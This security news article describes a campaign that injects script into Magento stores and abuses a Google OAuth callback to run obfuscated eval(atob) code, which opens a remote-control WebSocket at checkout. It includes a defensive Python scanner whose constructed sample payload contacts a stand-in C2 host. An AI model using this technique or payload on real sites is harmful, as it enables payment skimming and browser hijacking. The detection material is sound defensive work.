- Attackers use real Google URLs to sneak malware past antivirus software and into your browser undetected
- The malware only activates at checkout, making it a silent threat to online payments
- The script opens a WebSocket connection for live remote control, completely invisible to the average user
A new browser-based malware campaign has surfaced, demonstrating how attackers now exploit trusted domains such as Google.com to bypass traditional antivirus defenses.
According to a report by security researchers at c/side, the method is subtle, triggered only under specific conditions, and difficult for both users and conventional security software to detect.
It appears to come from a legitimate OAuth URL, but secretly executes a malicious payload with full access to the user's browser session.
Malware hidden in plain sight
The attack begins with a script injected into a compromised Magento-based e-commerce site, which references an apparently harmless Google OAuth logout URL: https://accounts.google.com/o/oauth2/revoke.
However, this URL carries a manipulated callback parameter that decodes and executes an obfuscated JavaScript payload using eval(atob(…)).
The use of the Google domain is the heart of the deception: because the script appears to load from a trusted source, most Content Security Policies (CSP) and DNS filters allow it without question.
The script only activates under specific conditions. If the browser appears to be automated, or the URL contains the word “payment”, it silently opens a WebSocket connection to a malicious server. This means it can tailor its malicious behaviour to the user's actions.
Any payload sent over this channel is base64-encoded; the script decodes it and executes it using the JavaScript Function constructor.
With this setup, the attacker can run code remotely in the victim's browser in real time.
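The pattern described above (a script tag whose src points at the Google OAuth revoke endpoint with a callback parameter that carries eval(atob(...)) instead of a plain function name) is easy to check for on the server side or in a crawler. The following is an added example, not c/side's tooling or code from the campaign: it parses page HTML, flags script URLs that match the abused endpoint, decodes any smuggled base64 payload, and reports which indicators the article mentions (WebSocket use, the word "payment", the Function constructor) appear in it. The sample HTML, the inner JavaScript and the c2.example.invalid host are constructed for the demonstration.

```python
"""Scan page HTML for script tags that abuse an OAuth callback parameter to
smuggle an eval(atob('...')) payload. Added example; constructed sample data."""
import base64
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, quote, urlparse

# Endpoint abused in the campaign described in the article.
ABUSED_HOST = "accounts.google.com"
ABUSED_PATH = "/o/oauth2/revoke"

# A legitimate JSONP-style callback is a bare function name; anything else is suspicious.
PLAIN_IDENT_RE = re.compile(r"^[A-Za-z_$][\w$.]*$")
EVAL_ATOB_RE = re.compile(r"eval\s*\(\s*atob\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)")
# Strings the article associates with the payload's behaviour.
INDICATOR_TERMS = ("WebSocket", "payment", "Function(", "atob(")


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in a page."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)


def decode_callback_payload(callback):
    """Return the JavaScript hidden inside eval(atob('...')), or None if absent/undecodable."""
    match = EVAL_ATOB_RE.search(callback)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def analyse_script_src(src):
    """Classify one script URL: None for benign URLs, otherwise a finding dict."""
    parts = urlparse(src)
    if parts.netloc.lower() != ABUSED_HOST or parts.path.lower() != ABUSED_PATH:
        return None
    callback = parse_qs(parts.query).get("callback", [""])[0]
    if not callback or PLAIN_IDENT_RE.match(callback):
        return None  # ordinary usage: a bare callback function name
    finding = {"src": src, "severity": "medium", "indicators": [], "payload": None}
    payload = decode_callback_payload(callback)
    if payload is not None:
        finding["severity"] = "high"
        finding["payload"] = payload
        finding["indicators"] = [t for t in INDICATOR_TERMS if t in payload]
    return finding


def scan_html(html):
    """Return findings for every suspicious script src in the page."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    return [f for f in (analyse_script_src(s) for s in collector.srcs) if f]


# Constructed sample page: one legitimate script plus one injected tag that mimics
# the pattern from the article (placeholder host, not a real server).
_INNER_JS = 'if(location.href.indexOf("payment")>-1){new WebSocket("wss://c2.example.invalid/")}'
_B64 = base64.b64encode(_INNER_JS.encode()).decode()
_CALLBACK = quote(f"eval(atob('{_B64}'))", safe="")
SAMPLE_HTML = f"""<html><head>
<script src="https://cdn.example.com/checkout.js"></script>
<script src="https://accounts.google.com/o/oauth2/revoke?callback={_CALLBACK}"></script>
</head><body></body></html>"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML):
        print(f["severity"], f["indicators"], f["payload"])
```

Run over a site's rendered checkout page, this flags the injected tag as high severity with the WebSocket and payment indicators, while the ordinary CDN script and a plain `callback=someFunction` usage pass silently. Because the check is on the callback value rather than the domain, it does not depend on domain reputation, which is exactly what the article says DNS filters and CSP rely on.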
One of the main factors behind the attack's effectiveness is its ability to evade many of the best antivirus programs currently on the market.
The script's logic is heavily obfuscated and only activates under certain conditions, making it unlikely to be detected by the best Android antivirus apps and static malware scanners.
They do not inspect or block JavaScript payloads delivered via apparently legitimate OAuth flows.
DNS filters or firewall rules also offer limited protection, because the initial request goes to a legitimate Google domain.
In corporate environments, even some of the best endpoint protection tools may struggle to detect this activity if they rely heavily on domain reputation or fail to inspect dynamic script execution within browsers.
While advanced users and cybersecurity teams can use content-inspection proxies or behavioural analysis tools to identify anomalies like these, average users remain vulnerable.
Limiting third-party scripts, separating the browser sessions used for financial transactions, and staying alert to unexpected site behaviour could all help reduce the risk in the short term.